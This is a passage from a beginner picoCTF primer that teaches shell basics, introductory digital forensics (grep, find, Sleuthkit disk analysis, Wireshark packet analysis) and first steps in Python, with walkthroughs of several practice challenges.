and there is always going to have opportunities to learn more about an amazing tool like the shell. But rest assured, I was proficient in the shell long ago and it does not take very much time before the shell starts working for **you**. Next up, what is that mystique unique to the hacker and their shell? ### 2.1. Symbol of the Hacker A blank, black screen and blinking cursor. Lines and lines of scrolling text and someone in front of that screen who seemingly understands an incomprehensible flow of information. That is the shell. The shell has many other names: the terminal, the command prompt, bash… PowerShell, if you’re looking at Windows and feeling blue. Each name has its own nuances. But that doesn’t matter right now. What matters is that there is the interface to computing devices that nearly all people use, and then there is the shell. If you’ve come here to get a shell and don’t care for much else, then you should skip to the Get a Shell section. Be warned that the shell is more powerful than the usual way of interacting with a device. Deleting files is permanent in the shell, any file can be accessed at any moment in the shell, and hopefully it’s not farfetched to assert that those two things are a dangerous combination. ### 2.2. Got Shell? Using a computer or smart device happens in 1 of 2 ways: - Using a pointer such as a mouse, touchpad or finger to select apps, files, or buttons - Using keys on a keyboard to enter simple or complex commands (the Shell) Thankfully, there are TLA’s (Three Letter Acronyms) for both methods described above: - GUI. Pronounced "gooey," stands for Graphical User Interface - CLI. Sounded out: "See-El-Eye," stands for Command Line Interface These acronyms are pretty good as far as acronyms go. We will refer to the shell by many names, perhaps sometimes even by the CLI initialism. The GUI doesn’t have as nice of a name as the shell, so we will probably use GUI to briefly refer to the interface that everyone knows about on computing devices that is driven by a pointer on a screen. Below is a screenshot of a shell after successful login and before the user has typed in any commands: In the picture above, there is a lot of empty space, and even the line of text that exists, does not provide a lot of clarity. The situation is simpler than how it looks. There are only 3 pieces of information in the screenshot above, and you would likely recognize at least one of them if it were **you** who logged on: From left to right in the shell command line prompt: - What does `Q0h313th` mean? - What does `pico-2019-shell1` mean? - What does `~` mean? - What does `$` mean? In terms of raw power, Q0h313th could delete every file they own on this machine with one command. That’s almost never desirable, and I will wait to show this command until there is something useful and desirable to do with it. In terms of useful power, Q0h313th could create a copy of an entire website for use when there is no accessible WiFi. That’s using the command `wget` . Now let’s talk about **getting** a shell! ### 2.3. Get a Shell Cybersecurity is a topic that is most deeply learned by listening **and** doing. For this reason, I advise you to create a picoCTF account at this point if you have not already. Beyond providing 120+ security challenges in helpful learning ramps, every picoCTF account gets access to a web-based Linux *shell*. A note on the structure of my (LT’s) chapters: many times I will provide a high level tutorial for a task and also a step by step walkthrough for the same task. This is my attempt at accommodating different learning styles and, different levels of experience. Typically, the high-level walkthrough is more for learners who already know the basics but need a refresher or need a reminder about the particulars when it comes to this Primer. The step by step walkthrough is more for learners who have never ventured in a particular task before. Of course, you must choose your own path here, but the safest bet may be to read the high-level walkthrough but actually put hands to keyboard for the step by step walkthrough. #### 2.3.1. High level tutorial - **Gain access to a practice shell**- Register for a picoCTF account - Click link in email that is sent to registered email address - Log in to the picoCTF webshell - - - #### 2.3.2. Step by Step Walkthrough **Register for a picoCTF account at the link below.** You will need to validate the email address you provide by clicking on a link that is sent to it. After successfully registering, a web shell can be accessed at the URL below. **Use the same user name and password that you registered on the picoCTF website to log into the shell at the link below** (or in the "Webshell" panel on the picoCTF website) For the sake of security, you will not see your password as you type it in. #### 2.3.3. Debrief Congratulations (esp. if this is your first time staring at a command prompt)! The next section focuses on demystifying the shell by relating its usage to devices you’ve probably already used for years; and if not, you’ll join the ranks of those whose first language is Shell. ### 2.4. GUI-fu to Shell-fu Our first language as children, whether Spanish, English or anything else primarily for communication with other humans, likely took little conscious effort on our part. For anyone who has learned a second language, it was quite the opposite: very little - if anything - came naturally. Learning Shell for someone who has only "spoken" GUI is like learning a second language. This is good news and bad news. The good news is that Shell and GUI are languages for something you’ve been using for probably years, but the bad news is there is a whole new vocabulary with only a handful of cognates (words that sound and mean the same in both languages) here and there. The basic computer operations that everyone is familiar with in GUI’s can easily be done in the shell as well. Here’s some of the most common operations for anyone using a computing device: Operation | GUI action | Shell action | Shell example | Note | ---|---|---|---|---| Start app | Click or touch icon of app | Type name of app and press enter | | Pressing the Enter key sends the command to the shell to run and return. | Open file | Browse to file, click | Use | | | Download app | Browse app store, click | Use | | Install ChessX game. The hard part was finding a relevant package name. | As the table above shows, using a GUI involves browsing and clicking, while using a shell involves knowing a good app to use. Google has made finding the right app for a shell interface much easier than it was years ago. As always for CTF’s, Google is your friend! However, more direct resources can be even more helpful, such as this website below that quickly explains shell commands: However, things do not always go as planned. The next section deals with those sorts of situations that inevitably arise. ### 2.5. What the Shell!? The main severity in the learning curve with the shell is that you must know the apps and commands available to you either by memorization or by looking them up when you need them. Certainly, it is faster to memorize as many as possible. The other challenge is the amount of typing that sometimes must be done to reference the intended file. Lastly, interfacing with apps also requires memorizing or looking up names of parameters or arguments. To summarize, some of the most challenging aspects of using the shell: - Memorizing commands (aka apps/programs) - Typing out long commands - Memorizing arguments for commands #### 2.5.1. Challenge 1: Memorizing commands Having a cheat sheet with shell commands listed is a must for overcoming the challenge of memorizing commands. Printing it out is a bonus if possible! (Saves screen space). The cheat sheet linked below is very good! #### 2.5.2. Challenge 2: Typing out long commands Many wonderfully brilliant students of mine have not known how to speed up their typing in the shell command prompt until thousands of picoCTF points into their learning. I take responsibility for this, and really, most of us go through that phase, but we do not have to! One word: **TAB** In the shell, pressing the TAB key invokes auto-complete by 1. assuming you’ve spelled the command or file correctly up to the point of pressing tab, and 2. completing the command or file name as much as it can. The functionality of auto-complete in the shell is so different from auto-complete in other apps, such as those in a phone, that shell auto-complete is often referred to as tab-complete. It takes some practice to get used to, but it is worth the time as it probably cuts number of key presses in half! Unlike auto-complete for a soft keyboard on a phone, tab-complete is never wrong, however, this is mostly because it makes no guesses and only helps with completing commands and file paths and names. It hardly ever helps complete arguments to commands besides file names. If pressing tab doesn’t do anything, this is either because 1. there is no such command or file name to complete what you’ve already typed into the command prompt, or 2. there are multiple commands or file names that could complete what you’ve already typed into the command prompt. Try typing another letter or two. Hit the tab key again. If nothing more is completed, hit tab one more time. If nothing really happens besides an angry noise or flash, then there is no way to complete what you’ve already typed (maybe there is a typo?), but if the issue is that there are multiple possibilities for tab complete to choose, then these options will display after your second strike on the tab key. The double press of tab can be done at any time, but if there are hundreds of options then the shell will ask for your approval before printing all those options because that’s not usually very helpful. In the next section, I will guide you through some fundamental shell commands to start getting a sense for the world of the shell. #### 2.5.3. Shell Nav Exercise 1 ``` # SOME NOTES: # * text listed after "$" I mean for you to enter into the shell and then # press enter # * text listed after "#" are comments from me to you but are ignored by # the shell # # this short tutorial is meant to run through foundational shell commands # with brief explanations for each # the following command "parks" your shell in your home directory (which is # somewhere you can create files!) $ cd # the following command shows where your shell is parked $ pwd # the following command creates a new directory called "tutorial" where you # are currently parked $ mkdir tutorial # the following command moves your shell and parks it in the "tutorial" folder # you just created $ cd tutorial # pwd stands for "print working directory". "working directory" is the # technical term for where one's shell is parked $ pwd # the following command creates an empty file with the name "note.txt" $ touch note.txt # the following command list the contents of your working directory $ ls # personally, I prefer a one column output of the contents of my working # directory, like $ ls -l # the following command shows the text content of "note.txt" (which is empty # right now) $ cat note.txt # the following command puts "hello world! I'm a snail" into "note.txt" $ echo "hello world! I'm a snail" > note.txt # cat will print something now that there is content in "note.txt" $ cat note.txt # the following command makes a copy of "note.txt" called "new-note.txt" $ cp note.txt new-note.txt # what is in "new-note.txt"? $ cat new-note.txt # * the following command opens "new-note.txt" in a terminal text editor # * try changing the file, then press Ctrl-X to exit and save $ nano new-note.txt # if you were successful, this command should print the new content $ cat new-note.txt # if you were not successful, that is just fine. revisit this exercise after # some more reading and practice! ``` #### 2.5.4. picoGym Problem Try out your new shell skills with this challenge from the picoGym: ### 2.6. Conclusion You may have noticed that we did not cover overcoming challenge 3. If you are curious, look up the `man` command explained in this cheat sheet: Using Google helps with learning commands to help solve problems in the shell, and also the "Explain Shell" website I linked to earlier in this chapter. ## 3. Forensics ##### Luke Jones ### 3.1. What is Forensics? In general, computer science professionals refer to "Digital Forensics" as "Forensics", for simplicity’s sake. Digital Forensics is the field in cybersecurity that tries to gather and understand evidence after an incident, which can be crime, to determine how it happened. This not only helps law enforcement when pledging someone innocent or guilty, but also to understand how to improve security in a system that was successfully attacked. Digital Forensics focuses on gathering evidence present in computer devices that hold information electronically. It is a branch of Forensic Science, which can also investigate any type of crime even if there is not computer media involved. ### 3.2. How to search for strings and filenames We will begin by learning how to search for information in a file system. Go to the picoCTF webshell at: Once you are connected, open up this problem in a separate tab: Download the problem file in your webshell by right-clicking the link in the problem description and selecting Copy Address or Copy Link. Then download it by typing in `wget ` and pasting the address after 'wget', space. Your command should look something like this, but is likely to not be exactly the same: `$ wget https://jupiter.challenges.picoctf.org/static/495d43ee4a2b9f345a4307d053b4d88d/file` You need to copy and paste your own link for the file. Great! So now you should have the challenge file saved on your webshell as `file` . Now what? As a reflex, you should always use the program `file` on new files that CTF challenges give you. The next command is kind of confusing, because the first word references the program `file` and the second word references the file named `file` , but run this command and see what it tells you: `$ file file` If done properly, it should tell you: `file: ASCII text, with very long lines` This tells us the file is plain text, but has unusually long lines. Since it is plain text, we can use `cat` to see what it contains. `$ cat file` Running this command will show that the file is mostly made up of gibberish. If this were a cryptography challenge, decoding the gibberish might be what needs to happen, but this is a 100 point general skills question, so I doubt that’s what needs to happen here. What is the challenge author pushing us towards? There’s only one hint and it is a `grep` tutorial. What is grep? Grep is a Linux utility, so we can learn about it by bringing up its man page: `$ man grep` The first line of the man page says: `grep, egrep, fgrep, rgrep - print lines that match patterns` This is perfect! We want to search through gibberish to find the flag. But how do we specify the pattern to search for and the file to search in? For this, I recommend the grep tutorial in the hint, not the man page. (Man pages tend to be highly technical and can be confusing to novices) One of the first examples in the grep tutorial uses the following command: `$ egrep 'mellon' mysampledata.txt` 'mellon' is what is being searched for and it is being searched for in 'mysampledata.txt' What if we searched for 'picoCTF' in 'file'? That command would look like: `$ egrep 'picoCTF' file` This should get the flag for you and print it on your screen. Let’s consider another challenge: Download the zip file into your webshell like you did for the previous challenge. As before, use `file` on it right away to have an idea of what you’re dealing with: `$ file files.zip` You should see the following output: `files.zip: Zip archive data, at least v1.0 to extract, compression method=store` To see more of this challenge, all we have to do is unzip the archive: `$ unzip files.zip` You’ll see a lot of output, but you can ignore that for now. List the contents of your current directory to see the new directory called 'files'. Try exploring that a bit with `cd` and `ls` , remember that you’re looking for a file called 'uber-secret.txt'. It may be hard to find 'uber-secret.txt' without the help of a tool. This problem is called 'First Find' and our last problem was called 'First Grep'. Is there a tool called 'find' in Linux? See if there is a manpage: `man find` There is! The first line reads: `find - search for files in a directory hierarchy` This sounds perfect. Exit the manual by pressing 'q'. As mentioned before, manpages are quite technical and can be overwhelming to try and read when you are first starting out. Let’s find some simpler examples by Googling. My Google query was `find file linux command` . I felt the need to specify ``` linux command ``` because `find` is such a generic word. My top Google result was this: I especially liked this result because I know plesk is not a commercialized site. Scroll down to the first example under `Basic Examples` . `find . -name thisfile.txt` This command means: starting in the current directory (which is what `.` , dot means), look in this directory and all subdirectories for the file named 'thisfile.txt'. We can slightly modify this example to fit our needs for the challenge. Make sure you are in the 'files' directory for this command. If you unzipped the archive in your home directory, you can use the following command to get back to the 'files' directory: `$ cd ~/files` Once you’re in the files directory, use this command: `$ find . -name uber-secret.txt` If you were in the 'files' directory when you ran this command, you should get the following output: `./adequate_books/more_books/.secret/deeper_secrets/deepest_secrets/uber-secret.txt` This is the path to the file that was found. We’re going to get into the same directory as this file by following the directories listed in this file path. We know that '.' is our current directory, so our first cd is to 'adequate_books'. Remember to use the Tab key to autocomplete unambiguous file and directory names. To explain what I mean by 'unambiguous' here’s a relevant example of an ambiguous file name in our current context: `$ cd a` If you press the Tab key after only typing 'a' it won’t autocomplete because there are two directories that start with 'a', 'acceptable_books' and 'adequate_books'. The shell doesn’t know which one you want. To get Tab to autocomplete type the following unambiguous directory name and then strike tab: `$ cd ad` When you press tab, it becomes: `$ cd adequate_books/` One last note on tab completion. When there is an ambiguous file name that doesn’t tab complete to something, you can hit the tab key again to see the list of files that could be completed with your given prefix. The other possibility is that there are zero matches on your given prefix, in which case nothing is printed when you hit tab a second time. So now we are in 'adequate_books', what’s next? From our found file above, 'more_books' is after 'adequate_books', so we cd accordingly: `$ cd more_books/` For this directory, observe the difference between `ls -l` and `ls -al` . You’ll see that an additional directory is shown when the '-a' flag is given. This flag means 'show all (including hidden files and directories)'. In Linux, any file or directory starting with '.' is considered hidden and will only be shown in specific circumstances. ``` $ cd .secret/ $ cd deeper_secrets/ $ cd deepest_secrets/ ``` All of these cd commands could be combined into a single command, but I’ve broken them up here for clarity and exposition. List the contents of 'deepest_secrets': `$ ls -al` To see the contents of the file, use `cat` : `$ cat uber-secret.txt` There’s the flag for this challenge! Try this slightly more difficult challenge with your new found skills: ### 3.3. Disk analysis One of the most fundamental skills of a forensics analyst is inspecting and deeply understanding disks. These can be actual hardware or dumps of disks captured in files. There are a few really good GUI tools out there for not just disk analysis, but whole management of digital evidence for cases. Our disk analysis problems will not require any licenses to proprietary software. Some people like to use Autopsy which is a GUI frontend to the tools we will demonstrate how to use in this section. We will use the individual Sleuthkit tools so that you learn a little more than from a GUI that abstracts away some of the details. Disks are all about the details. #### 3.3.1. Sleuthkit Intro presentation We will be considering disk images exclusively, due to the difficulty of sending real hard drives through the Internet at the time of this writing! Try this picoGym problem, which presents the first step in analyzing disk images: This problem should be pretty approachable given what you’ve done leading up to this point, namely downloading individual challenge files and using command line utilities. Something new in this challenge is using netcat or `nc` . For this challenge, nc is used to access a checker program. This program will check your answer to the challenge and give you the flag if it is correct. For this challenge, the invocation of nc (what you type to run it) is given and is straightforward, but I will explain it for the sake of clarity. Here’s my given nc invocation: `nc saturn.picoctf.net 52279` The last number might be different for you, that’s expected. We’ll go through what each part of this program call means: - `nc` This, of course, is the name of the program we are running. Netcat, or 'nc' as this system calls it. Sometimes the program name will be the full 'netcat' variety, but on the webshell, it is 'nc'. - `saturn.picoctf.net` This is the name of the computer we’re connecting to. This is a challenge server that picoCTF runs. - `52279` This is the number of the port we’re connecting to for the challenge. This will probably be different for your challenge. So go ahead and solve your first Sleuthkit problem on the picoGym and learn the tool, `mmls` , which we will use for subsequent problems. #### 3.3.2. Sleuthkit Apprentice walkthrough Here’s the next challenge in that short series: This challenge requires `mmls` as a first step to use other Sleuthkit tools, but now is the time for some true forensic background. A disk image is a huge dump of many numbers. But these numbers have an invisible structure to them that gives them much more meaning. Navigating this invisible structure manually is tedious and deeply difficult, but the Sleuthkit tools handle this invisible structure for us. To begin using the Sleuthkit tools we must understand some of the layers that apply to disk images. The four main layers are: media, block, inode, and filename. - Media: the media layer tools all are prepended with 'mm' and operate on the disk image with little guidance from the analyst. `mmls` is a media layer tool that gives us the partition table of the image and key information for delving into the other layers. Media is the lowest level, providing key information to access the deeper layers, but not shedding much light on the data contained in the image. - Block: the block layer is the second lowest level of the four layers considered here. Block layer tools are prepended with 'blk' in the Sleuthkit. `blkcat` is a block layer tool that outputs the contents of a single block. The block layer is the numbers of the disk image broken into equal-sized chunks. A single file is likely to contain multiple blocks. - Inode: the inode layer is the bookkeeping layer of a disk image. It’s like the table of contents, with the chapter numbers being like the inodes, and the pages like the blocks of a file. Inode layer tools are prepended with 'i'. `icat` is an inode layer tool that outputs a single file based on its inode number. - Filename: the filename layer is one layer that most any user of a computer actually sees and interacts with. This is the layer with which we will start our exploration of the Sleuthkit in the current challenge. Interacting with the filename layer will look a lot like using the shell normally. Filename layer tools are prepended by 'f'. `fls` lists the files on an image starting at the root. This is what we will use for our exploration of the disk image. First off, download the challenge file: `$ wget https://artifacts.picoctf.net/c/331/disk.flag.img.gz` Next, decompress the challenge file: `$ gunzip disk.flag.img.gz` Dump the partition table of the disk image. We want to find the offset to the main partition: ``` $ mmls disk.flag.img DOS Partition Table Offset Sector: 0 Units are in 512-byte sectors Slot Start End Length Description 000: Meta 0000000000 0000000000 0000000001 Primary Table (#0) 001: ------- 0000000000 0000002047 0000002048 Unallocated 002: 000:000 0000002048 0000206847 0000204800 Linux (0x83) 003: 000:001 0000206848 0000360447 0000153600 Linux Swap / Solaris x86 (0x82) 004: 000:002 0000360448 0000614399 0000253952 Linux (0x83) ``` It would seem that the fourth partition is the main partition, because it is the largest and has an uneven length. That’s a bit of a guess, but it’s for sure either partition labeled 'Linux (0x83)'. Copy the 'Start' value to your clipboard of the fourth partition. Let’s look at the root of this partition by supplying the 'Start' value to the offset option in `fls` : ``` $ fls -o 360448 disk.flag.img d/d 11: lost+found d/d 12: boot d/d 1985: etc d/d 1986: proc d/d 1987: dev d/d 1988: tmp d/d 1989: lib d/d 1990: var d/d 3969: usr d/d 3970: bin d/d 1991: sbin d/d 451: home d/d 1992: media d/d 1993: mnt d/d 1994: opt d/d 1995: root d/d 1996: run d/d 1997: srv d/d 1998: sys d/d 2358: swap V/V 31745: $OrphanFiles ``` This looks like the main partition because it has many of the standard linux root directories, like 'home', 'usr', 'root', etc. Remember that `fls` is part of the filename layer Sleuthkit tools. You can think of `fls` as standing for 'filename list'. Here, it’s listed all the top-level directories in the disk image. This next part requires some forensic intuition. A lot of these directories are system-generated and maintained. Let’s focus on the directories that have a lot of potential user influence like `root` and `home` . But first, let’s take a step back and print the help information for `fls` : `$ fls` `fls` will print some succinct help information if ran with no arguments. This is true for many command line tools and programs, but is not universal. ``` $ fls Missing image name usage: fls [-adDFlhpruvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-m dir/] [-o imgoffset] [-z ZONE] [-s seconds] image [images] [inode] If [inode] is not given, the root directory is used -a: Display "." and ".." entries -d: Display deleted entries only -D: Display only directories -F: Display only files -l: Display long version (like ls -l) -i imgtype: Format of image file (use '-i list' for supported types) -b dev_sector_size: The size (in bytes) of the device sectors -f fstype: File system type (use '-f list' for supported types) -m: Display output in mactime input format with dir/ as the actual mount point of the image -h: Include MD5 checksum hash in mactime output -o imgoffset: Offset into image file (in sectors) -p: Display full path for each file -r: Recurse on directory entries -u: Display undeleted entries only -v: verbose output to stderr -V: Print version -z: Time zone of original machine (i.e. EST5EDT or GMT) (only useful with -l) -s seconds: Time skew of original machine (in seconds) (only useful with -l & -m) ``` The first line after our `fls` invocation with no arguments is an error message, saying that we failed to include a mandatory argument, the image name. However, `fls` uses the opportunity to educate us on how to properly invoke it. All arguments in square brackets, i.e. '[' and ']', are optional. Anything not in square brackets is mandatory. After the invocation is a helpful note saying 'If [inode] is not given, the root directory is used'. This is how we first used `fls` . We supplied no inode and the root directory was printed. But now, we want to look at specific directories so we will need their inodes. Helpfully, `fls` actually prints those along with file and directory names. It’s the number on the line with each name, if we look back to our listing of '$ fls -o 360448 disk.flag.img' we can find the inode number for `/home` which is 451. Let’s add that to our `fls` call: ``` $ fls -o 360448 disk.flag.img 451 $ ``` This actually seems to do nothing. It’s not actually doing nothing, there just are no results. `/home` is an empty folder in the disk image. Let’s try another directory, `/root` . Go back and get the inode number and plug it into `fls` : ``` $ fls -o 360448 disk.flag.img 1995 r/r 2363: .ash_history d/d 3981: my_folder ``` This directory has a file, called `.ash_history` and a directory named `my_folder` . Let’s see what is in 'my_folder'. Use the inode number like before: ``` $ fls -o 360448 disk.flag.img 3981 r/r * 2082(realloc): flag.txt r/r 2371: flag.uni.txt ``` Bingo! Now with the inode number of 'flag.uni.txt' we can print the file using `icat` : ``` $ icat -o 360448 disk.flag.img 2371 picoCTF{by73_5urf3r_adac6cb4} ``` Please be aware that your flag will likely have a different suffix. Now, it’s good to go back and address what the other file in 'my_folder' was. Its name is flag.txt, why can’t we `icat` that file? In short, because the file has been deleted and the inode has even been reassigned to a different file. You can try using `icat` on the 2082 inode, but it is part of an unrelated file somewhere on the system. If you want to continue to learn about Sleuthkit tools, try this problem: If you want to use what you know to dive even deeper into a disk, try this problem: If you get stuck, try reading writeups of the challenges. Just google search 'Writeup, [challenge name], picoCTF'. There’s going to be various levels of quality and depth in writeups, so don’t feel like you have to stick with the first one you look at. ### 3.4. Packet analysis Another important field of forensics is packet or network analysis. This field of forensics conerns itself with understanding what has happened on a network through the examination of captured packets. This will require the use of a GUI tool called 'Wireshark', which means you cannot use the webshell to complete this problem. The webshell can be used to complete many introductory problems, but more advanced problems sometimes need a GUI tool to be solved in an efficient manner. Consider this an exercise in installing and using GUI tools. Knowing how to do this will help you greatly in the future. #### 3.4.1. Installing Wireshark On your computer, download Wireshark from their site: You must download the version corresponding to your operating system. It should be a straightforward process, however, if you have any issue or doubt, you can Google plenty of good documentation about Wireshark. If you’re using a Chromebook you will need administrator privileges to enable Linux mode on the device. With Linux mode enabled, you can install Wireshark through apt-get and run it with the Linux terminal. #### 3.4.2. Packet Primer walkthrough Consider this picoCTF challenge: Download the packet capture and open it in Wireshark. It should look like this once you open it. Google how to open a packet capture in Wireshark if you can’t figure it out by exploring the menus of the tool. Packet analysis is all about filtering, even for this packet capture that is tiny. Most packet captures are going to have thousands if not tens of thousands of packets. This capture has only 9 because it is an introductory problem. You could manually inspect each packet and that wouldn’t be a bad strategy, but we want to approach this problem more technically, because it is just setting us up for future problems that have thousands of packets. So, we know that the flag is unlikely to be in the ARP messages as these are just messages relating IP addresses and hardware addresses. To filter out ARP messages, add `!arp` to your filter in Wireshark: 'ARP' stands for Address Resolution Protocol and these messages are common in every network capture as it is needed to connect a hardware address to an IP address. | Of the remaining 5 packets, the first 3 are the TCP handshake and so they can be ignored. Of the remaining 2 packets, let’s look at the one that has the PSH flag set, which means there is data for the application in the packet: The TCP handshake, also known as the 'three-way handshake' can be identified by the flags in the packets. First 'SYN' from host A, the 'SYN, ACK' from host B, then finally, 'ACK' from host A. 'SYN' stands for synchronization, and 'ACK' stands for acknowledgement. Both parties synchronize and acknowledge. | When you click on packet 4, you should see the flag in the packet bytes pane, you may have to scroll down to see it all: Remember, your flag might be different than mine. It would be good to notice that there was something different about the packet with the flag from the beginning. It has a protocol of 'S101', and it’s the only one. Such glaring oddities should always be examined. Sometimes, the only clue in a packet analysis problem is a small difference between the flag packet and the rest of the thousands of packets. A good strategy is to filter as many packets as you can, then look for oddities. I should note also that there is not always a 'flag packet'. Sometimes a flag can span across multiple packets, just like packet payloads can span across multiple packets. 'S101' is an uncommon protocol. The packet isn’t really speaking S101, it is just using the preferred port of the protocol, port 9000. | Leave your packet capture open if you can. We are going to use it to illustrate concepts introduced in the next section. #### 3.4.3. Network Layers We’ll now cover some background to deepen your understanding of packets and networks. The networks we commonly use today, are broken down into different layers. This design by layers assigns responsibilities to each layer to accomplish something. It is good to have a design by layers for several reasons. For example, if network engineers want to make a change in one of the layers, the impact on the other layers is minimized. Another example, is that if you are a programmer and want to connect your application with a server, you do not necessarily need to care if the user is using wifi or ethernet cable, or how the user is connecting to the internet. Your application can simply trust other layers are going to take care of that and your application will have a successful connection. These are the layers, viewed in a top down approach. - Application layer: Responsible for handling data traffic between applications. HTTP belongs to this layer; HTTP protocol is commonly used to obtain Web Pages. In the Packets Primer capture, click the fourth packet. This packet’s application layer is called 'Data' in the middle pane. Click the arrow to expand the view of the layer. There’s not much in this display because the application data is just the flag. Other layers will break down all the fields of a layer, showing the value for each one in the packet. Figure 6. Application layer expanded - Transport layer: Responsible for providing several connections on the same host, that means that you can have several applications on the same device and each of them can have a different connection even if it is just one device. It also defines functionalities for reliable transport. Two protocols are used on this layer. TCP (Transport Control Protocol). You use this protocol when you need to have reliable transport, this makes sure that if a piece of information was missing while being transfertransferred it is resent. HTTP from the Application layer, runs on top of TCP, because when you visit a Web Page you want to have every part of it accurately. On the other hand, when you don’t need reliable transport, but you want faster transport that does not resend parts that were missing, UDP (User Datagram Protocol) is used. An example when UDP is needed is for voice communication. When you are talking if a little part of the audio is missing, you do not want it to appear later in the communication because that would confuse the listener. The listener can still understand what you are saying if the part missing is small enough. Since UDP has no controls for transport, it is faster than TCP. This layer assigns a port to each connection, and that is how it tells the difference between connections in the same computer, because of the port. - Network layer: It provides devices with an address in the network called the IP (Internet Protocol) address, and routes information through different routers. It provides mapping between all the computers connected to the internet. When you connect to a network in some specific place, an IP is assigned to your device. - Data link layer: It provides communication between devices that are connected directly. Examples of protocols in the data link layer are Ethernet or WiFi. You generally use WiFi to send messages to your router directly without any other devices in between. Each device has a physical address in wifi or ethernet, known as the mac address. The mac address is used for this layer. This is not an address like the IP that can change depending on the network you are connected to. The mac address is assigned to the hardware of your network card when it is manufactured. - Physical layer: This handles electrical pulses on the wire that represent bits. ## 4. Programming in python ##### Samuel Sabogal Pardo A computer program is a set of instructions that allow us to do a task automatically on a computer. We can make a computer program in a programming language. Computer programs are generally called "software". With a computer program we can do all sorts of things. Some examples are calculators, video games, text processors, browsers, and all the things you have ever used in a computer. Nowadays, there are computers everywhere. Any device such as a cell phone, smart watch, or modern car is running software that was made in programming. To begin, we are going to learn python, which is one of the easiest programming languages to learn. Let’s begin writing python! We are not going to explain each detail of python independently. For that, you could read the python documentation, which is located here: However, if you don’t know any programming, going directly to the documentation can be overwhelming. We are just going to explain some parts of python which are a good start to begin to write your own programs to exploit software. We do this by making examples that achieve one objective and we explain how they work along the way. This will allow you to read code written by someone else, of course, with the help of google if they use elements that you did not know previously. When you are learning a programming language, there is a tradition in which the first program you write simply prints "Hello World!"" on the screen. We will be using python 3, the number 3 is the version of python. Let’s start doing the "hello world!" program. Open your shell, go to your home directory, and create a folder called "python_examples". You can do it with the following lines: ``` $ cd $ mkdir python_examples ``` Now, access that folder using `$ cd python_examples` Create a file called "helloworld.py", you can do it with: `$ nano helloworld.py` To make our 'hello world!' program in python requires just one line of code! Simply write this on the file: `print("Hello World!")` Now save the file in nano by pressing 'control' and 'x' at the same time, and then press 'y', then 'enter'. Run the program on the terminal with: `$ python3 helloworld.py` You should see that "Hello World!" is printed on the screen when you run it: ``` $ python3 helloworld.py Hello World! ``` That was our first program in python! Python, as any other programming language, has variables. A variable can hold different types of data. What we just printed on the screen was a string of characters. When we enclose something in quotes, we are telling python it is a string of characters. A string is a data type. In python, to create a variable we simply choose a name and assign the value that we want. For example, we are going to create a variable called my_string, and we are going to assign to that variable the value "Hello World!": `my_string = "Hello World!"` That line of code makes the variable my_string equal to "Hello World!". In python programming, the symbol = is used to assign the value from the right side of the equal to the variable at the left side. Variables can have any name we like, except some specific words that are reserved for python instructions. For example, the word 'print' is reserved, so you cannot use it as a variable name. Now, if we print the variable, it should print "Hello World!". Do that experiment next. The python script should look like this: ``` my_string = "Hello World!" print(my_string) ``` Run it and you will see "Hello World!"" printed on the screen again. `Hello World!` You can also assign numbers to variables and do mathematical operations between them. Let’s make a simple program that calculates the area of a square. Create a file called "area.py" and write the following: ``` side1 = 4 side2 = 8 result = side1 * side2 print(result) ``` If you run that script, what do you think is going to print? When you run it you should see: `32` Those were very trivial examples. Now, suppose you want to print a list of 20 numbers that starts at 0 and ends at 19. We can do that in just a couple of lines, instead of writing 20 prints! Create a file called loop.py and use the following code: ``` for i in range(20): print(i) ``` Run it and you should see: ``` 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ``` We have introduced the concept of a python loop. The word 'for' is used to declare a 'for loop', which is a loop that iterates in a range of numbers. The 'i' next to 'for', is a variable that will be incremented on each iteration on a range of 20. We can change the range for a bigger one or a smaller one by changing the number inside the parenthesis. Note that a line of code will be inside the loop, if it is indented by four spaces. For example, run this: ``` for i in range(10): print("I am inside the loop") print(i) print("I am OUTSIDE") ``` You will see: ``` I am inside the loop 0 I am inside the loop 1 I am inside the loop 2 I am inside the loop 3 I am inside the loop 4 I am inside the loop 5 I am inside the loop 6 I am inside the loop 7 I am inside the loop 8 I am inside the loop 9 I am OUTSIDE ``` Note that the string "I am OUTSIDE" was printed only once, because it is outside the loop. To be inside the loop the code needs to be indented by 4 spaces, as we said. Once we use a line of code that is not indented for the first time after the loop, that is considered the end of the loop. If you try to indent a line after the loop has finished, like this: ``` for i in range(20): print("I am inside the loop") print(i) print("I am outside") print("I am outside 2") ``` That would cause a syntax error when you run it. A syntax error means that the code is not complying with the way python should be written. In this case, would specifically show an indentation error: ``` python3 helloworld.py File "helloworld.py", line 5 print("I am outside 2") ^ IndentationError: unexpected indent ``` That happens because we put an indentation, and the for loop was already closed. Syntax errors at the beginning can happen to you by accident and you might not fix them very easily, but with a little time you will begin to fix them quickly if they happen. To practice, spot the syntax error in the following code: ``` for i in range(20): prin("I am inside the loop") print(i) print("I am outside") ``` What is the error? Run it to see what happens. It will show: ``` python3 helloworld.py File "helloworld.py", line 2 prin("I am inside the loop") ^ SyntaxError: invalid syntax ``` Python shows you the line with the error, but not the exact location. In this case we missed the 't' from 'print'. Another error might be that the colon from the for loop is missing: ``` for i in range(20) print("I am inside the loop") print(i) print("I am outside") ``` In that case it will show you: ``` python3 helloworld.py File "helloworld.py", line 1 for i in range(20) ^ SyntaxError: invalid syntax ``` If you add the missing colon after range(20), the program should work. A syntax error can happen because any reserved word is misspelled; remember that reserved words are words that python recognize as instructions. For example, 'print', 'for', 'in' are reserved words in our program. Additionally, a syntax error can happen because of a missing symbol such as a colon. As a challenge, implement a program that prints your name 10 times, and below your name prints a number starting at 100 and ends at 109. The output of your program should look similar to: ``` Samuel 100 Samuel 101 Samuel 102 Samuel 103 Samuel 104 Samuel 105 Samuel 106 Samuel 107 Samuel 108 Samuel 109 ``` Hint: use range(100, 110). Once you are done with the previous challenge, fix the following program that has several syntax errors and make it work: ``` for i inn range(10: prnt(i) ``` The program should print the numbers from 0 to 9. So far, we have seen how a computer can repeat an instruction several times, which is something fundamental in a computer. We want computers to do repetitive tasks for us. Another fundamental functionality we want in computers is conditional clauses. A conditional clause means that a program will do an action only if a condition is met or take another path if the condition is not met. For example, suppose you are printing the numbers from 0 to 9, and you want to print a message when the number is less than 5 and another message when the number is equal or greater than 5. You would do it in the following manner: ``` for i in range(10): if i < 5: print("The following number is less than 5") if i >= 5: print("The following number is greater than or equal to 5") print(i) ``` Run it and verify the results. We have introduced an if-clause, which is a conditional clause. Note that all the code is inside the 